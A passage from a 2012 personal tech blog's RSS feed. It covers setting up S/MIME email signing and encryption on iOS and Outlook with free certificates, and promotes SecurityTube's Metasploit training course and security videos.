<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0681.png"><img src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0681-200x300.png" alt="" title="IMG_0681" width="200" height="300" class="aligncenter size-medium wp-image-361" /></a></p>
<p>7. You should now see something like this.<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0677.png"><img class="aligncenter size-medium wp-image-349" title="IMG_0677" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0677-200x300.png" alt="" width="200" height="300" /></a></p>
<p>8. Select done and open your IOS setting from your main IOS screen.</p>
<p>9. Select &#8220;Mail, Contacts, Calendars&#8221;<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0683.png"><img class="aligncenter size-medium wp-image-350" title="IMG_0683" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0683-200x300.png" alt="" width="200" height="300" /></a></p>
<p>10. Select your mail account that has the email address that matches the one you used for your certificate. And select the &#8220;Account&#8221; button to get more options and &#8220;Advanced&#8221;. Now change the S/MIME section from the first image to the second.<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0684.png"><img class="aligncenter size-medium wp-image-351" title="IMG_0684" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0684-200x300.png" alt="" width="200" height="300" /></a><br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0685.png"><img class="aligncenter size-medium wp-image-352" style="border-style: initial; border-color: initial;" title="IMG_0685" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0685-200x300.png" alt="" width="200" height="300" /></a></p>
<p>11. Select the Account button on the top left, then done in the top right, mail in the top left, and settings on the top left to finish off.</p>
<p>12. Your email will now be digitally signed when being sent from this account, and encrypted **ONLY when you have the recipient&#8217;s Public Key**</p>
<p><strong>Installing Other People&#8217;s Public Key in IOS</strong></p>
<p>1. When a trusted sender sends you a digitaly signed email (and you have S/MIME options turned on [you did this in the previous section]) you can install their public key and send encrypted email. When you have completed these steps you will send encrypted email but the recipient must do this as well to send you encrypted email. If they don&#8217;t you will receive un-encrypted email, but send them encrypted email.</p>
<p>2. Open the email from the trusted sender.</p>
<p>3. Select the &#8220;From&#8221; field and you will bring up their contact info. Select Install to install the sender&#8217;s public key.<br />
<a href="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0110.png"><img class="aligncenter size-medium wp-image-356" title="IMG_0110" src="http://www.en-lightn.com/wp-content/uploads/2012/03/IMG_0110-152x300.png" alt="" width="152" height="300" /></a></p>
<p>4.Once this is done, and you have the S/MIME settings from the previous steps, you will by default send encrypted email to this user. When you send to other users you will notice that the address goes red and an open lock is displayed letting you know that the email is un-encrypted.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=341</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>An Answer to an Age Old Question</title>
		<link>http://www.en-lightn.com/?p=309</link>
		<comments>http://www.en-lightn.com/?p=309#comments</comments>
		<pubDate>Wed, 07 Mar 2012 23:00:42 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[certification]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[script kiddie]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[securitytube]]></category>
		<category><![CDATA[skiddie]]></category>
		<category><![CDATA[teach]]></category>
		<category><![CDATA[training]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=309</guid>
		<description><![CDATA[I don&#8217;t know how many times I have been asked, &#8220;Can you teach me to hack?&#8221;. It has got to be one of the most anoying questions. Even though the vaugue answer &#8220;learn to code, think differently, and become part of the community&#8221; usually works, that is not what they are looking for. Most people [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t know how many times I have been asked, &#8220;Can you teach me to hack?&#8221;.  It has got to be one of the most anoying questions.  Even though the vaugue answer &#8220;learn to code, think differently, and become part of the community&#8221; usually works, that is not what they are looking for.  Most people want the quick script kiddie answer.  </p>
<p>That answer has always been a port scanner and Metasploit.  Most n00bs didn&#8217;t go any further because it was a command line and you actually had to know a little about what you were doing.  Then Metasploit community came and the skiddies got a GUI.  Still many don&#8217;t know how to use metasploit.  Well the day has come.  Can you teach me to hack?  NO!  but these guys will.  </p>
<p>SecurityTube has released it&#8217;s courseware for their SMFE (SecurityTube Metasploit Framework Expert) certification.  Yep, it is over 10 hours of you learning to &#8220;hack&#8221;.  I use that term very loosly here &#8230; OK you don&#8217;t learn to hack but you get security basics, and you will understand how to use metasploit.  That in its self will get you into a lot of computers out there.  You probably wont be able to hack Google but you will have a shot at Sony or the FBI.  </p>
<p>OK that last piece was a joke but it is funny!</p>
<p>Enroll and get extra perks here &#8211;> <a href="http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#enroll" title="http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#enroll" target="_blank">http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#enroll</a></p>
<p>Get the DVD for Free here &#8211;> <a href="http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#question" title="http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#question" target="_blank">http://securitytube-training.com/certifications/securitytube-metasploit-framework-expert/#question</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=309</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Email Encryption</title>
		<link>http://www.en-lightn.com/?p=304</link>
		<comments>http://www.en-lightn.com/?p=304#comments</comments>
		<pubDate>Wed, 07 Mar 2012 00:00:24 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[cipher]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[computer security]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[outlook]]></category>
		<category><![CDATA[pop3]]></category>
		<category><![CDATA[protect]]></category>
		<category><![CDATA[safe communications]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[smtp]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=304</guid>
		<description><![CDATA[I am defiantly not the first person to write about this but there are still not enough people that know they can have decent security for little or no cost. So don&#8217;t blame me if your parents/partners sniff your home network, grab your email or account password and read everything that you don&#8217;t want them [...]]]></description>
			<content:encoded><![CDATA[<p>I am defiantly not the first person to write about this but there are still not enough people that know they can have decent security for little or no cost.  So don&#8217;t blame me if your parents/partners sniff your home network, grab your email or account password and read everything that you don&#8217;t want them to.  Maybe you are cheating on them, maybe your grades suck, or hell it can be as innocent as a surprise party.  There is no excuse to basically let anyone read your email. First off let me say that this is not a 100% sure fire method.  But it will scare off enough skiddies, and wannabees to keep your email relatively safe.  So lets start.</p>
<p>1. Start by setting your mail client to use POP3 and SMTP with SSL.  This varies between mail clients and email providers.  Check with your provider for details.</p>
<p>2. Get yourself a digital cert provided by a trusted CA &#8230; FOR FREE!  Go to <a href="http://www.comodo.com/home/email-security/free-email-certificate.php" title="http://www.comodo.com/home/email-security/free-email-certificate.php" target="_blank">http://www.comodo.com/home/email-security/free-email-certificate.php</a> and go through the easy to follow steps.  Once you are done you will have yourself a personalized digital cert.</p>
<p>3. Tell all your friends, or at least the ones that you want to have encrypted email capabilities with to do the same thing.</p>
<p>4. Set your mail client to digitally sign your emails by default.  This will send out your public key to your friends.  Make sure that your friends send you theirs.</p>
<p>5. Now once you receive a digitally signed email you need to &#8220;install&#8221; that cert.  Sometimes with mail clients it is automatic, sometimes not.  With outlook make sure that the certificate is added to their contact card.  Your friends will have to do the same thing with your public key (digital cert).</p>
<p>6. Now you will be able to send encrypted email between yourself and your friends.</p>
<p>Now let me point out couple of BIG points here.  If you use a shared profile &#8211; you are hooped.  If you don&#8217;t password protect your profile &#8211; you are hooped.  Basically if your Certificate &#8220;Key Chain&#8221; is compromised/accessed in any way by anyone but you &#8211; you are hooped.  The way to keep the emails sent to you encrypted and safe is to <strong>KEEP YOUR PRIVATE KEY PRIVATE!</strong>  If you don&#8217;t do that, the encryption don&#8217;t mean Jack.</p>
<p><strong>Go to <a href="http://www.en-lightn.com/?p=341" title="http://www.en-lightn.com/?p=341">http://www.en-lightn.com/?p=341</a> for detailed IOS information</strong></p>
<p><strong>Some additional help with Outlook, SSL, and Certs</strong></p>
<p><a href="http://support.microsoft.com/kb/287532" title="http://support.microsoft.com/kb/287532" target="_blank">http://support.microsoft.com/kb/287532</a><br />
<a href="http://office.microsoft.com/en-us/outlook-help/about-digital-signatures-HP005249555.aspx" title="http://office.microsoft.com/en-us/outlook-help/about-digital-signatures-HP005249555.aspx" target="_blank">http://office.microsoft.com/en-us/outlook-help/about-digital-signatures-HP005249555.aspx</a><br />
<a href="http://office.microsoft.com/en-us/outlook-help/send-a-digitally-signed-message-HP005242354.aspx" title="http://office.microsoft.com/en-us/outlook-help/send-a-digitally-signed-message-HP005242354.aspx" target="_blank">http://office.microsoft.com/en-us/outlook-help/send-a-digitally-signed-message-HP005242354.aspx</a><br />
<a href="http://office.microsoft.com/en-us/outlook-help/verify-the-digital-signature-on-a-signed-message-you-receive-HP005242361.aspx" title="http://office.microsoft.com/en-us/outlook-help/verify-the-digital-signature-on-a-signed-message-you-receive-HP005242361.aspx" target="_blank">http://office.microsoft.com/en-us/outlook-help/verify-the-digital-signature-on-a-signed-message-you-receive-HP005242361.aspx</a><br />
<a href="http://office.microsoft.com/en-us/outlook-help/encrypt-e-mail-messages-HP001230536.aspx?CTT=1" title="http://office.microsoft.com/en-us/outlook-help/encrypt-e-mail-messages-HP001230536.aspx?CTT=1" target="_blank">http://office.microsoft.com/en-us/outlook-help/encrypt-e-mail-messages-HP001230536.aspx?CTT=1</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=304</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Free Security Training</title>
		<link>http://www.en-lightn.com/?p=302</link>
		<comments>http://www.en-lightn.com/?p=302#comments</comments>
		<pubDate>Mon, 05 Mar 2012 22:30:53 +0000</pubDate>
		<dc:creator>Nick Schroedl</dc:creator>
				<category><![CDATA[En-Lightn.com]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[compsec]]></category>
		<category><![CDATA[Computer]]></category>
		<category><![CDATA[computer security]]></category>
		<category><![CDATA[free]]></category>
		<category><![CDATA[infosed]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[training]]></category>
		<category><![CDATA[Web based training]]></category>

		<guid isPermaLink="false">http://www.en-lightn.com/?p=302</guid>
		<description><![CDATA[Although I have not checked out all the videos on the site, I can say that this information can help a lot of people understand some concepts of security. For others the site may be a little &#8220;Mickey Mouse&#8221; but you never know what you might learn about. http://www.securitytube.net/ is a neat site that people [...]]]></description>
			<content:encoded><![CDATA[<p>Although I have not checked out all the videos on the site, I can say that this information can help a lot of people understand some concepts of security.  For others the site may be a little &#8220;Mickey Mouse&#8221; but you never know what you might learn about.  <a href="http://www.securitytube.net/" title="http://www.securitytube.net/" target="_blank">http://www.securitytube.net/</a> is a neat site that people should check out if they are interested in computer security.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.en-lightn.com/?feed=rss2&#038;p=302</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

